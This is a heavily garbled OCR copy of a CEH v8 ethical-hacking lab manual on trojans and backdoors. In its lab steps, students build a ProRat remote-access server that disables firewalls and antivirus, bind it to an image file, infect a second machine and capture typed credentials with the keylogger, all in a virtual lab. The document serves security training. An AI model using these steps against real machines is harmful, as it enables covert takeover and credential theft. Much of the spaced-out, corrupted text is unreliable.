Ceh v8 labs module 06 trojans and backdoors

CEH Lab Manual

T ro ja n s

a n d

B a c k d o o rs
M o d u le 06

M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s

T ro ja n s a n d B a c k d o o r s
A

Trojan is a program th a t contains a m alicious or harm ful code inside apparently

harm less program m ing or data in such a iray th a t i t can g et control and cause
damage, such as m ining the file allocation table on a hard drive.
I CON

KEY

^~! V a l u a b l e

1

L a b S c e n a rio
A c c o r d in g

to

B a n k

In t o

s e r io u s

r is k s

S e c u r it y

N e w s

(h t t p :/ / w w w .b a n k in f o s e c u r it y .c o m

),

in f o r m a tio n
T r o ja n s
T est tout
k n o w l e d g e ____________

m

W e b

e x e r c is e

c o m

p o s e

p r o m

is e d

d e v ic e

is

w h ic h

111

m

A n d r o id

p o t e n t ia lly
a n

a lic io u s

a p p s

a re

a n y

d e v ic e s ,

a t

o p e n

t o r

r is k

th e

F B

b e c a u s e

e n v ir o n m
a r o u n d ,

p e r s o n a l

e n t

s o

is

I

th e
a re

th e

a n d

s e n s itiv e

w a r n s .

r e a l
im

B u t

p r o b le m

p o s s ib le

p o t e n tia l

f o r

in f o r m

e x p e r ts
is

to

a t io n
s a y

a n y

m a lic io u s

c o n t r o l.

fin a n c ia l

s to r e d
m

0 11

o b ile

a p p lic a tio n s ,

A n d

a n y w h e r e

fr a u d .

W o r k b o o k r e v ie w
A c c o r d in g
a d v a n c e d

to

c a p t u r in g
a c c e s s

s o ld

Y o u

a re

t h e f t

b la c k

a

s e c u r ity

e x p e r ts ,
a

ta k e

t h e n

t h e m

T r o ja n

th e

k e y lo g g e r

th a t

b a n k in g

th a t

u s e

s t o le n

o v e r ,

is

T r o ja n

s t e a ls

a n d

lo g in

I D

s c h e d u le

s p e c ific a lly

k n o w n

s

a s

a n
b y

p a s s w o r d s

a n d

c it a d e l,

c r e d e n tia ls

o n lin e - b a n k in g

to

fr a u d u le n t

d e s ig n e d

f o r

tr a n s a c tio n s .

f in a n c ia l

fr a u d

a n d

m a r k e t.

a d m

p r o t e c t in g

o f v a lu a b le

is

H a c k e r s

t in s

th e

in c lu d e

z e u s ,

a c c o u n t s ,

c r e a te d

0 1 1

s e c u r ity

o f

k e y s tr o k e s .

o n lin e

H a c k e r s

c y b e r

v a r ia n t

th e

d a ta

in is t r a t o r
n e t w o r k

f r o m

o f

y o u r

f r o m

th e

c o m

T r o ja n s

n e t w o r k ,

a n d

p a n y ,
a n d

a n d

y o u r

b a c k d o o r s ,

id e n t it y

jo b

r e s p o n s ib ilit ie s

T r o ja n

a tta c k s ,

th e

th e ft.

L a b O b je c tiv e s
T h e

o b je c t iv e

o f

tin s

o f

th e

la b

is

to

h e lp

s tu d e n ts

le a r n

to

d e te c t

Trojan

a n d

backdoor

a tta c k s .

T h e

o b je c t iv e

a

la b

in c lu d e :

■

C r e a t in g

s e r v e r

■

D e t e c t in g

T r o ja n s

■

A t t a c k in g

a

a n d

t e s tin g

a n d

n e t w o r k

v u ln e r a b ilitie s

& Tools

a n d

a

n e t w o r k

f o r

a tta c k

b a c k d o o r s

u s in g

fla w s

s a m p le

T r o ja n s

a n d

d o c u m

e n t in g

a ll

d e te c te d

L a b E n v iro n m e n t

demonstrated in
this lab are
available in

T o

c a r r y

‫י‬

o u t

A

t in s , y o u

n e e d :

Window Server 2008

c o m p u t e r r u n n in g

a s

G u e s t- 1 in

v ir t u a l m a c h in e

D EH
:C ToolsCEHv8

‫י‬

Window 7

r u n n in g

a s

G u e s t- 2

in


Module 06 Trojans

C E H La b M anual Page 425

‫י‬

A

■

and Backdoors

w e b

b r o w s e r w it h

A d m in is tr a tiv e

In te r n e t

p r iv ile g e s

to

a c c e s s

r u n

t o o ls

E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Stricdy Prohibited.


L a b D u r a t io n
T im

e :

4 0

M in u t e s

O v e r v ie w
A

T r o ja n

is

a

d a m a g e , s u c h

it h

p r o g r a m

th a t

programming

h a r m le s s

W

o f T r o ja n s a n d B a c k d o o r s

th e

a s

h e lp

c o m p u te r

o f

a n d

pictures,

0 1‫־‬

r u in in g

d a ta

a n d / 0 1‫ ־‬s h o w

b e

s u c h

111

a

a n

a b le

m e s s a g e s

re a d

w a y

th a t
0 11 a

a c c e s s

p e r s o n a l

th e

0 11

h a r m

g e ts

a tta c k e r

to

o r

t a b le

file allocation

d ie

Trojan,

a

w o u ld

malicious

c o n t a in s

it

t ill

c o d e

get control

c a n

h a r d

in s id e

a p p a r e n tly
a n d

c a u s e

d is k .

stored passwords

to

111

a

delete files, display

d o c u m e n ts ,

s c re e n .

La b T ask s
TASK

1
P ic k

Overview

a n

o r g a n iz a t io n

d ia t y o u

e d u c a t io n a l in s tit u t io n , a

R e c o m

m

e n d e d

la b s

■

C r e a t in g

■

W

■

P r o x y

■

H

a

r a p p in g

T T P

to

a s s is t y o u

S e r v e r

a

f e e l is

w o r t h y

o f y o u r

c o m m e r c ia l c o m p a n y ,

w id i T r o ja n s

U s in g

T r o ja n

th e

U s in g

P r o R a t

O n e

F ile

a tte n tio n .

0 1‫ ־‬p e r h a p s

a n d

a

T in s

c o u ld

b e

a n

n o n p r o t it c h a r ity .

b a c k d o o rs :

to o l

E

X

E

M a k e r

S e r v e r T r o ja n

T r o ja n

■

R e m

o t e

A c c e s s

‫י‬

D e te c t in g

T r o ja n s

U s in g

A t e lie r W

e b

R e m

o t e

la b

C o m

e x e r c is e .

m

a n d e r

T r o ja n s

‫י‬

C r e a t in g

a

S e r v e r

U s in g

th e

T h e e t

■

C r e a t in g

a

S e r v e r

U s in g

th e

B io d o x

■

C r e a t in g

a

S e r v e r

U s in g

th e

M

‫י‬

H a c k

W

in d o w s

7

u s in g

o S u c k e r

M e ta s p lo it

L a b A n a ly s is
A n a ly z e
y o u r

a n d

t a r g e t ’s

P L E A

S E

d o c u m e n t
s e c u n ty

T A

L K

th e

r e s u lts

p o s tu r e

T O

Y O

U
R


a n d

R

r e la te d

I N

E L A

to

e x p o s u r e

S T

T

E D

R

U

C

T O

th e

d ir o u g h

T

O
T H

R

I F
I S

G iv e

p u b lic

a n d

Y O

H

U

y o u r

tre e

A

V

E

o p in io n

0 11

in f o r m a tio n .

Q

U

E S T

I O

N

S

L A B .



Lab

C r e a tin g a S e r v e r U s in g t h e P r o R a t
T ool
A

Trojan is a program th a t contains m alicious or harm ful code inside apparent/)‫׳‬

harm less program m ing or data in such a way th a t i t can g et control and cause
I CON

KEY

1 ^ 7 V a lu a b le

L a b S c e n a r io
A s

m

o r e

a n d

m

o r e

p e o p le

r e g u la r ly

u s e

th e

In t e r n e t ,

c y b e r

s e c u r ity

is

b e c o m

in g

in f o r m a tio n
m
T est you r
k n o w le d g e

=

W e b

e x e r c is e

o r e

a re

im

u s in g

in f o r m


m

a t io n

In t e r n e t
h a c k e r s

m

p o r t a n t

c o m

m

e

a lw a r e
b y

c a n

a ls o

h a c k e r s

h a c k

n o t

w it h

a n d

y e t

p e r s o n a l

s y s te m s
o n ly

s n if f y o u r

p e o p le
a t io n ,

v ir u s e s ,

m e a n s

a c h in e .

a re

s ,

y o u r

t h a t

n o t

fin a n c ia l

w o r m

p r o t e c t in g

d a ta , w h ic h
m

a n y

in f o r m

w it h

a b o u t

a n o t h e r

m

th e

O t h e r

a n d

m

a w a r e
d a ta ,

h a c k e r s

it .

a n d

T r o ja n

a c h in e

a tta c k s

o f

b u s in e s s

h o r s e s .

f r o m

c a n

H a c k e r

m

lis t e n

in c lu d e

B u t

a lw a r e ;
to

y o u r

s p o o fin g ,

h ija c k in g .

m

a y

d e n ia l- o f - s e r v ic e
b u s in e s s .

to

is

u n ic a t io n
a n d

e v e r y o n e ,

in f e c t in g

s e c u r ity

m a p p in g ,

S o m

f o r

ta k e

c o n t r o l

a tta c k ,

A g a in s t

w h ic h

o f

y o u r

m a k e s

h ig h - p r o file

w e b

a n d

m

ta r g e t

a n y

c o m

s e r v e rs

o t h e r

p u t e r s

s u c h

a s

m

a c h in e s

to

u n a v a ila b le
b a n k s

a n d

c o n d u c t
f o r

n o r m

c r e d it

a
a l

c a r d

g a te w a y s .

Y o u

a re

in c lu d e
t h e ft

a

s e c u r ity

a d m

in is t r a t o r

p r o t e c t in g

th e

n e t w o r k

o f v a lu a b le

d a ta

f r o m

th e

o f y o u r
f r o m

c o m

p a n y ,

T r o ja n s

n e t w o r k ,

a n d

a n d

a n d

id e n t it y

y o u r

jo b

b a c k d o o r s ,

T r o ja n

a tta c k s ,

th e ft.

L a b O b je c t iv e s
T h e

o b je c t iv e

o f

tin s

la b

is

to

h e lp

s tu d e n ts

le a r n

to

d e te c t

T r o ja n

a n d

b a c k d o o r

& Tools
demonstrated in
this lab are

a tta c k s .

T h e

o b je c tiv e s

o f

th e

la b

in c lu d e :

available in
D EH
:C ToolsCEHv8

■

C r e a t in g

■

D e t e c t in g

a

s e r v e r

T r o ja n s

a n d

a n d

te s tin g

th e

n e t w o r k

f o r

a tta c k

b a c k d o o r s

Module 06 Trojans
and Backdoors


E th ic a l H ack in g and Counterm easures Copyright © by EC-Council


‫י‬

A t t a c k in g

a

n e t w o r k

v u ln e r a b ilitie s

a n d

u s in g

fla w s

s a m p le

T r o ja n s

a n c l d o c u m

e n t in g

a ll

d e te c te d

L a b E n v ir o n m e n t
T o

e a r n ‫ ״‬t in s

■

o u t, y o u

Prorat

T h e

n e e d :

t o o l

lo c a t e d

D:CEH-ToolsCEHv8 Module 06 Trojans

a t

and BackdoorsTrojans TypesRemote Access Trojans (RAT)ProRat
■

A


W

in d o w s

■

A


Window 8 (Virtual Machine)

■ Windows Server 2008
‫י‬

A

‫י‬

w e b

b r o w s e r


S e r v e r

r u n n in g

p r iv ile g e s

to

as

H o s t M a c h in e

111 V ir t u a l M a c h in e

Internet

w it h

2 0 1 2

a c c e s s

t o o ls

11111

T u n e :

2 0

M in u t e s

O v e r v ie w o f T r o ja n s a n d B a c k d o o r s
A

T r o ja n

h a r m le s s

is

a


Note:

T h e

d iffe r

fr o m

c lie n t is

p r o g r a m

th a t

p r o g r a m m in g

th e

a s

r u in in g

v e r s io n s

d a ta

d ie

file

o f th e

w h a t

is

in

s a m e

a s

s h o w n

d ie

malicious

c o n t a in s

o r

in

a

a llo c a tio n

c r e a te d
la b ,

s u c h

t a b le

C lie n t o r

b u t

111 d iis

th e

w a y

o n

H o s t

a c u ia l

o r

h a r m fu l

th a t
a

it

c a n

h a r d

a n d

p ro c e s s

c o d e

a p p a r e n tly
a n d

c a u s e

d r iv e .

a p p e a r a n c e
o f

in s id e

get control

c r e a tin g

o f th e
th e

w e b s it e

s e r v e r

a n d

m

a y
d ie

la b .

La b T ask s
L a u n c h

W

in d o w s

Create Server

V ir t u a l

M

a c h in e

a n d

n a v ig a t e

to

Z:CEHv8 Module

(RAT)ProRat.

with ProRat

2.

D o u b le - c lic k

3 .


8

06 Trojans and BackdoorsTrojans TypesRemote Access Trojans

C lic k

ProRat.exe

111 W

Create Pro Rat Server

in d o w s

t o

8

V ir t u a l M

s ta r t p r e p a r in g

to

a c h in e .

c r e a te

a

s e r v e r.



PflD H R C H .n ET Pf?D FE55 ID r> H L HTTEHnET !!!

Cne
o n ct
English

PCIn
fo
M ssag
e e

Ap a n
p lic tio s
W dw
in o s
A m -T
d in F P
F n yS ff F M n g r
u n tu
ile a a e
!E p re
x lo r
SearchF s
ile
Rg
e istry
C n l Pan
o tro el
S u D w PC
ht o n
C ba
lip o rd
K yL g e
e o gr
G D mg P ssw rd
ive a a e a o s
R D w lo e
. o n dr
P te
rin r
O lin E ito P C n ective
n e d r ro o n
Ca
re te
‫ י‬C e t Downloader S r e ( K a t
► rae
evr 2 by)
C e t C I V c i Ls ( 6K a t
r a e G i t m it 1 b y )

^Help
F IG U R E

4 .

T h e

Create Server

w in d o w

1 .1 : P r o R a t m a i n w i n d o w

a p p e a r s .

Create Server

Pro on ective N tifica n(N o an R u
C n
o tio etw rk d o ter)
Supports Reverse Connection
‫ ט‬U Pro onn
se C ective N tifica n
o tio
» un *p o
o. o1 .c m
IP (D S) A d ss:
N d re

N tifica n
o tio s
1 y= J P a s s w o r d b u tto n :
R e t r ie v e p a s s w o rd s fr o m

G eral Settin s
en
g

m a n y s e r v i c e s , s u c h as

T
est

M il N tifica n
a o tio

p o p 3 a c c o u n ts , m e sse n g e r,
I E , m a il, e tc.

D oesn't support R everse Connection

B dw File
in ith

T
est

Q U M il N tifica n
se a o tio
o b rmn y h o o
E-M
AIL: b m e a @ a o .c m

Server Ex n n
te sio s

IC Pager N tifica n
Q
o tio

Q U IC Pager N tifica n
se Q
o tio

Server Icon

icquin:

T
est

[r]

C I N tifica n
G o tio

W) H lp
e

Server Siz
e:

r

T
est
Q U C I N tifica n
se G o tio
ttp w .y u . o / i- in p ra g
C I URL: h ://w w o rsite c rn cg b / ro tc i
G
C
reate Server

3 2K ayt
4 b

F IG U R E

5 .

C lic k

General Settings

Password, Victim Name,
o v e r

6 .


th e

U n c h e c k

c o n n e c t io n

th e

y o u

h ig h lig h t e d

to

1 .2 : P r o R a t C r e a t e S e r v e r W i n d o w

c h a n g e
a n d

h a v e

th e
to

options

fe a tu r e s ,

s u c h

Port Number

th e

v ic t im

o r

a s

s h o w n

111

Server Port. Server

a s
y o u

liv e

th e

w is h

th e

to

c o n n e c t

s e t tin g s

f o llo w in g

d e fa u lt .

s c r e e n s h o t.



Server P rt:
o
Server Passw rd
o :
V N m:
ictim a e
Q 3 ea fake e r mssa e
iv
rro e g .
Q •1l server o inta
•e
t
n s ll.
Q C A -FWo s rt.
ill V
n ta
Q d a leW
is b indow XP SP2 Secu C n r
s
rity e te
I... Q D leW
isab indow XP F w ll.
s
ire a
Q Ha W
e r indow XP R
s
estore P in
o ts.
Q )on't sen LA n tifica n fro (i9 .i6 .”.“j o (1 .*.x j
d N o tio s m 2 8 r 0 .x
I IPro
tectio fo re o in Local Server
n r mv g
In isib
v ility
Q H e Processes fro A T M ag (9 /2 /X
id
m ll ask an ers x k P)
Q H eV
id alues F mA k do R istry Ed rs(9 /2 P)
ro ll in f eg
ito x k/X
Q H e N es F mM n (9 /2 /K
id am ro sco fig x k P)
Q U Te in teProcess (2k/XP)
n rm a

G eral Settin s
en
g
B dw File
in ith
Server Ex n n
te sio s
Server Icon

Ity !

N o te : y o u can use

D y n a m ic D N S to c o n n e c t
o v e r th e In t e r n e t b y u s in g
n o - i p a c c o u n t r e g is t r a t io n .

Server Siz
e:

r

C
reate Server

3 2K ayt
4 b

F IG U R E

7 .

8 .

Bind with File

C lic k
u s in g

.jpg

th e

C h e c k

file

to

to

1 .3 : P r o R a t C r e a t e S e r v e r - G e n e r a l S e t t i n g s

b in d

b in d

th e

th e

s e r v e r

w it h

a file ; 111

t in s

la b w e

a re

s e r v e r.

Bind server with a file.

C lic k

Select File,

a n d n a v ig a t e

to

Z:CEHv8 Module 06 Trojans and BackdoorsTrojans TypesRemote
Access Trojans (RAT)ProRatlmages.
9 .

m

S e le c t

th e

Girl.jpg

file

to

b in d

w it h th e

s e r v e r.

C lip b o a rd : T o re a d

d ata fro m ra n d o m access

T is File w b B d d
h
ill e in e :

m e m o ry.

B dw File
in ith
Server Ex n n
te sio s
Server Icon

Server Siz
e:

C
reate Server

3 2K ayt
4 b

I-------------F IG U R E


1 .4 : P r o R a t B i n d i n g w i t h a f ile



1 0 .

S e le c t

Girl.jpg

111

Look in:

th e

w in d o w

a n d

t h e n

c lic k

Open

to

b in d

th e

f ile .

Images

‫תז°11ו‬
£Q1
V N C

V N C T r o ja n s ta rts a
s e rv e r d a e m o n in th e

in f e c t e d s y s te m .

Rle nam
e:

Girl

Open

Files o type:
f

Cancel

F IG U R E

1 1 .

£ 9

C lic k

OK

a fte r

s e le c t in g

th e

1 .5 : P r o R a t b i n d i n g a n im a g e

im a g e

f o r

b in d in g

w it h

a

s e r v e r.

F ile m a n a g e r: T o

m a n a g e v ic t im d ir e c to r y f o r
a d d , d e le t e , a n d m o d if y .

1 2 .

1 11

Server Extensions

Server Extension


s e t tin g s ,

s e le c t

EXE

(lia s

ic o n

s u p p o r t )

111

Select

o p t io n s .



Select Server Ex n n
te sio
^ EXE (H ico su p rt)
as n p o

N tifica n
o tio s

Q SCR (H ico su p rt)
as n p o

Q PIF (H n ico su p rt)
as o n p o

G eral Settin s
en
g

Q C M(H n ico s p o
O as o n u p rt)

Q BA (H n ico s p o
T as o n u p rt)
B dw File
in ith
Server Ex n n
te sio s
Server Icon

£ Q

G iv e D a m a g e : T o

f o r m a t t h e e n t ir e s y s te m
f ile s .

Server Siz
e:

C
reate Server

4 7K ayt
9 b

r

F IG U R E

1 3 .

1 11

Server Icon

b u t t o n

a t

1 .7 : P r o R a t S e r v e r E x t e n s i o n s S e t t i n g s

s e le c t

a n y

r ig h t

s id e

b o t t o m

o f
o f

th e
th e

ic o n s ,
P r o R a t

a n d

c lic k

th e

Create Server

w in d o w .

N tifica n
o tio s
G eral Settin s
en
g

M

B dw File
in ith

m

Server Ex n n
te sio s
I t c o n n e c t s to th e

v ic t im u s in g a n y V N C

H U 11

Server Icon

v ie w e r w it h th e p a s s w o rd
“ s e c r e t.”

jJ

V) H lp
e
Server Ico :
n
Server Siz
e:

C o se n Icon
h o ew
C
reate Server

4 7K ayt
9 b

I
F IG U R E

1 4 .

C lic k

O K

a lt e r

th e

s e r v e r

h a s

1 .8 : P r o R a t c r e a t i n g a s e r v e r

b e e n

p r e p a r e d ,

a s

s h o w n

111

th e

lo llo w in g





F IG U R E

1 5 .

N
to

£ G

SH T T P D

H T T P

o w

y o u

c a n

s e n d

victim’s

th e

m

1 .9 : P r o R a t S e r v e r h a s c r e a t e d

d ie

s e r v e r

a c h in e

a s ,

file

lo r

111 d i e

by mail

e x a m p le ,

s a m e c u r r e n t d ir e c to r y

o r
a

a n y

c o m

m

celebration

u n ic a t io n
file

to

m e d ia

r u n .

i s a s m a ll
Applicator Tools

s e rve r th a t c a n b e

Vicvr

e m b e d d e d in s i d e a n y
m Preview pane

E

p ro g ra m . I t c a n b e w ra p p e d
w it h a g e n u in e p r o g r a m

[]‫־‬B Details pane

A&

Manage

S Extra large icons
t

‫־‬t N"
₪
‫־‬

Large icons

f t| M5d un icons | | j Small icons
lirt
| j ‫ ״‬Details

S

1

( g a m e c l e s s .e x e ). W h e n

□

Item check boxes

□ Filename extensions
I I Hidden items

______________ Layout_________

e x e c u te d , it tu rn s a

o

c o m p u t e r in t o a n in v is ib le
w e b s e rve r.

©

^

1

Show/hide

‫נ״י‬

« Trcjans Types ► Femote Access Trojans (RAT)

A
K Favorites

*.

J . Downlead
Irraces

■ Desktop

J , Language

£ Download}
1 Recent places
S3J

| ^ bnded.server |
^ 1
Fnglish

1 f Libraries
‫־‬
^

£ ProRat

F*| Documtnte

j__ Readme

J* Music

^ T ‫ ״‬rk6h

fcl Pictures

|__ Version.Renewals

81 Videos
Homegrojp
AP Computei

sL Local Disk O
,
5 ? CEH-Tools (1a
^(1 Network
v
9 items
1 item selected 208 MB

F IG U R E

1 6 .

N

o w

g o

to

W

in d o w s

S e r v e r

1 .1 0 : P r o R a t C r e a t e S e r v e r

2 0 0 8

a n d

n a v ig a t e

to

Z:CEHv8 Module 06

Trojans and BackdoorsTrojans TypesRemote Access Trojans
(RAT)ProRat.
1 7 .


D o u b le - c lic k

binder_server.exe

a s

s h o w n

111

th e

f o llo w in g




.
El•

p

ital

‫ י‬T ‫0׳‬J%n(Trt>« » Rencte A cr«s "roiflrs RAT ( ‫ * י‬PraRat

|

id t

^•w

Tjolc

t#lp

V
iew

Oroanize ▼
•

M t

I•I Site

Tavoi ite -»‫־‬
ks
i|

? cajres

^

^ 0° *°

r>ornn#ntc

£

‫״‬

T " T ™ ----------------- Pate modified— | - | Typ |- 1>

H

Music

1

More

»

Folders

v

I

J i Botnet 'rojars

I

^

j j

j , Ya5»cn_R.c‫ ־‬o5
«n

Comnand Shell ~r0)s

I

Defacenent ‫־‬ro;ars

I

[ : Readne
[ ^ ‫ ־‬uHoct

J4 Destnjave T'ojans

I

Ebandng Trojans

I

J4 E-Mal T0‫׳‬j3ns

I

JA FTP Trojar

I

GUITrojors

I

HTTP H I P S "rpjars

I

S

I

J4 MACOSXTrojons

ICMP Backdoor

I

J i Proxy Server Trojan:
. Remote Access “ rcj?- *

I

J . Apocalypse
Atelie‫ ׳‬Web Remji

X

I

4

I

j.. ProRat

. D*fkCo‫׳‬r«tRAT

I

. VNC’ rojans

£

M a rl

H

C

S.

F IG U R E

1 8 .

N

o w

s w it c h

to

W

in d o w s

Windows Server 2008

I C M P T r o ja n : C o v e r t
c h a n n e ls a r e m e t h o d s in

P r o R a t

m

a in

-O g*

. New Text Docuneil •No... I

‘

w in d o w

8

V ir t u a l

a n d
a n d

1 .1 1 : P r o R a t W i n d o w s S e r v e r 2 0 0 8

th e

c lic k

liv e

M

a c h in e

p o r t

a n d

n u m

b e r

e n te r
a s

th e

th e

I P

a d d r e s s

d e fa u lt

111

o f

th e

Connect.

w h i c h a n a tt a c k e r c a n h id e
d a t a i n a p r o t o c o l d i a t is

1 9 .

111 t i n s

la b ,

th e

I P

a d d r e s s

o f W

in d o w s

S e r v e r

2 0 0 8

is

(1 0 .0 .0 .1 3 )

u n d e t e c t a b le .

Note:

I P

a d d re s s e s

F T

m

ig h t

b e

d if f e r

111

c la s s r o o m

la b s

ProRat V1.9

mum

- Poit

PCIn
fo
Ap a n
p lic tio s
M ssa e
e g
W dw
in o s
Am -T
d in F P
Ca
ht
F n yS ff F Mn g r
u n tu
ile a a e
!E p re
x lo r
SearchF s
ile
C n l Pan
o tro el R g try
e is
S u D w PC ScreenS o
ht o n
ht
C ba
lip o rd
Kyo gr
eL g e
G D mg P ssw rd
ive a a e a o s
R D w lo e
. o n dr
P te
rin r
Services
O lin E ito P C n e
n e d r ro o n ctive
Ca
re te
F IG U R E

2 0 .

E n t e r
c lic k


th e

password

y o u

112: P r o R a t C o n n e c t in g In f e c t e d S e r v e r

p r o v id e d

a t

th e

tim e

o t

c r e a tin g

th e

s e r v e r

a n d

OK.



Passw rd
o :

O
K
F IG U R E

2 1 .

N

o w

c lic k

y o u

a re

PC Info

connected

to

a n d

1 .1 3 : P r o R a t c o n n e c t i o n w i n d o w

th e

c h o o s e

Cne
acl

th e

v ic t im

s y s te m

m

a c h in e .

in f o r m

T o

a t io n

a s

te s t
111

th e

th e

c o n n e c t io n ,

f o llo w in g

f ig u r e .

B f P>
>
—ProRat V 1 .9 IC o n n e c te d [1 0 .0 .0 .1 3 ^ ^ ^ H B B B ^ ^ ^ ^ ^ r ‫- ׳‬

x1

F H d H H C H . n e T p « o r e 5 5 1 D n F 1 L 1m‫־‬e p r 1 E T !!!

m

Poit: g n g

o n t e c h n i q u e s c a ll e d

English

t u n n e lin g , w h ic h a llo w o n e

P If
C no

p r o t o c o l t o b e c a r r ie d o v e r

Ds o n c
i c n et

//////// PC Information ////////

IB
A pi ai n
p lc to s

Ms a e
es g

Computer N e
am
User N e
am
Windows Uer
Windows Language
Windows Path
System Path
Tem Path
p
Productld
Workgroup
Data

Wn o s
i dw

Ca
ht

a n o t h e r p ro to c o l.

A m -T
d i FP
n

F n ySuf Fl M n g r
un t f
ie a a e
!xl rr
E poe

S a c Fl s
e r h ie

C nr l P n l
o to a e

R gsr
e i ty

S u Dw P Sr e S o
h t o n C ce n h t
Kyo gr
eL g e

Ci b ad
lp o r

Gv D m g P s w r s
i e a a e a s od
R Dwl dr
. o no e
Pi t r
rne

Rn
u

F IG U R E

2 2 .

2

Attack System
Using Keylogger

N

o w

c lic k

KeyLogger

N
O
9/23/2012

S se I f r ai n
y t mnomto

M i A de si R gsr
al d r s n e i t y
W Hl
; ep

1 .1 4 : P r o R a t c o n n e c t e d c o m p u t e r w i d o w

steal

to

u s e r

p a s s w o r d s

f o r

th e

o n lin e

s y s te m .

[r?~^roRa^7^onnectedn0l0l0^3r~
P H □ H R C H .‫ ח‬E T P P G F E S S I C i n F I L in T E P r i E T !!!
Ds o n c
i c n et
ip: Q j Q 2
Poit: g n i R:
I I 11‫ ׳‬h
//////// PC Information ////////
P If
C no

A pi ai n
p lc to s

Ms a e
es g

Wn o s
i dw

Ca
ht

A m -T
d i FP
n

F n ySuf Fl M n g r
un t f
ie a a e
!xl rr
E poe

S a c Fl s
e r h ie

C nr l P n l
o to a e

R gsr
e i ty

S uDw P Sr e S o
h t o n C ce n h t
Ci b ad
lp o r

Kyo gr
eL g e

Gv D m g P s w r s
i e a a e a s od
R Dwl dr
. o no e
Pi t r
rne

Rn
u

Computer N e
am
User N e
am
Windows Uer
Windows Language
Windows Path
System Path
Tem Path
p
Productld
Workgroup
Data

WIN-EGBHISG14L0
Administrator
English (United St
C:Windows
C:Windowssysterna
C:UsersADHINI~1
N
O
9/23/2012

L i.

Srie
e vc s

O ln E i o P o o n ci e
ni e dt r r C n e tv

S se I f r ai n
y t mnomto

M i A de si R gsr
al d r s n e i t y

L s vst d2 w bst s
a t i ie 5 e ie

Ce t
r ae
P i f r ai nR c i e .
c nomto e ev d
F IG U R E


English (United St
C:Windows
C:Windowssystemc
C:UsersADMINI~1

L s vst d2 w bst s
a t i ie 5 e ie

Ce t
r ae
P i f r ai nR c i e .
c nomto e ev d

TASK

1
0

WIN-EGBHISG14L0
Administrator

l -L

Srie
e vc s

O ln E i o Fr C n e tv
ni e dt r ' o o n ci e

m

R

C o v e r t c h a n n e ls r e ly

W Hl
; ep

1 .1 5 : P r o R a t K e y L o g g e r b u t t o n

A ll Rights Reserved. Reproduction is Strictly Prohibited.


2 3 .

m

T h e

Key Logger

w in d o w

w ill

a p p e a r .

T liis T r o ja n w o rk s

lik e a r e m o t e d e s k to p
a c c e s s . T h e h a c k e r g a in s
c o m p le t e G U I a c c e s s o f
th e r e m o t e s y s te m :
■

In f e c t v ic t im ’s c o m p u te r
w it h s e rv e r.e x e a n d p la n t
R e v e r s e C o n n e c t in g
T r o ja n .

■

T h e T r o ja n c o n n e c ts to
v i c t i m ’s P o r t t o t h e
a t t a c k e r a n d e s t a b lis h in g
a re v e rs e c o n n e c t io n .

■

A tta c k e r th e n has
F IG U R E

c o m p le t e c o n t r o l o v e r
v i c t i m ’s m a c h i n e .
2 4 .

N

o w

s w it c h

N o t e p a d

i
File

Windows Server 2008

to

a n d

1 .1 6 : P r o R a t K e y L o g g e r w i n d o w

ty p e

a n y

m

a c h in e

a n d

o p e n

a

b r o w s e r

o r

te x t.

Text Document -Notepad

Edit

Format

View

Help

‫פר‬

Hi th ere
T h is is my username: xyz@yahoo.com
password: test<3@#S!@l|

m

B a n k i n g T r o ja n s a re

p r o g r a m t h a t s t e a ls d a t a
f r o m in fe c t e d c o m p u te rs
v ia w e b b ro w s e rs a n d

A

Ik.

p ro te c te d s to ra g e .

F IG U R E

2 5 .

W

h ile

th e

v ic t im

p a s s w o r d , y o u

2 6 .

N

o w

t im e


s w it c h
t o

t im e

is

c a n

1 .1 7 : T e s t t y p e d i n W i n d o w s S e r v e r 2 0 0 8 N o t e p a d

message

w r it in g

a

c a p t u r e

th e

to

W

t o

c h e c k

in d o w s
f o r

8

lo g

V ir t u a l

d a ta

o r

e n t e r in g

a

user name

a n d

e n t ity .

M

a c h in e

updates

t r o m

a n d
th e

c lic k

Read Log

v ic t im

f r o m

m a c h in e .



E

=9/23/201211:55:28 PM
a i b bth ism u am yz o .co
h o is y sem e;x atyah o m
p o ; testsh b tto ith sh u n ith
assw rd
iftl u w l iftb tto w 2

|

R ea d Log

|

D e le te L o g

L^L 1 ‫—י‬U L 1 !_ ‫רו‬
•
■
•

S a v e as

H e lp

----------------------------------------------------------1

C □

11 •‫ י‬t 1
_

C le a r S c r e e n

| K e y L o g R e c e iv e d .

|

F IG U R E

2 7 .

Note:

N

o w

P r o R a t

y o u

c a n

K e y lo g g e r

u s e

w ill

a

lo t

n o t

1 .1 8 : P r o R a t K e y L o g g e r w i n d o w

o f

fe a u ir e s

r e a d

s p e c ia l

f r o m

P r o R a t

o n

th e

v ic t im

’s

m a c h in e .

c h a ra c te r s .

L a b A n a ly s is
A n a ly z e
y o u r

a n d

d o c u m e n t

t a r g e t ’s s e c u n t y

d ie

r e s u lts

p o s tu re

a n d

r e la te d

to

e x p o s u re

d ie

la b

e x e r c is e .

th ro u g h

p u b lic

G iv e

a n d

y o u r

fre e

o p in io n

o n


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.

Q u e s t io n s
1.

C re a te
W

a n d

2 .

s e rv e r w it h
X

P

a d v a n c e d

E v a lu a te

a n d

c it ie s

o r

o p t io n s

F ir e w a ll, e tc ., s e n d

v e r if y w h e d ie r y o u

o d ie r


a

in d o w s

e x a m in e

c a n

it

a n d

s u c h

c o m m u n ic a t e

v a r io u s

m e d io d s

as

K ill A

c o n n e c t it

to

w it h

th e

to

V - F W
th e

v ic tim

c o n n e c t to

o n

v ic tim

s ta r t, d is a b le
m a c h in e ,

m a c h in e .

v ic tim s

i f d ie y

a re

111

c o u n t r ie s .

E th ic a l H ack in g and Countenneasures Copyright © by EC-Council


T o o l / U

t i l i t y

In f o r m

a t io n

S u c c e s s f u l

O

u t p u t :

p u t e r

U s e r

N a m

W

in d o w s

W

in d o w s

W

T o o l

T e m

p

W

□

Y e s

P l a t f o r m

0


C o n n e c t io n

e :

e A

A d m

b j e c t i v e s

B lin d e d

A c h ie v e d

s e r v e r .e x e

a t io n

Y I N

- E G

B H

I S G

14 L O

in is t r a t o r

Y e r :

L a n g u a g e :

P a t h :

P a t h :

I D

E n g lis h

(U n it e d

S ta te s )

c : w in d o w s

c : w in d o w s s y s t e m

c : U

s e r s A

D

M

I N

3 2

I ~ l

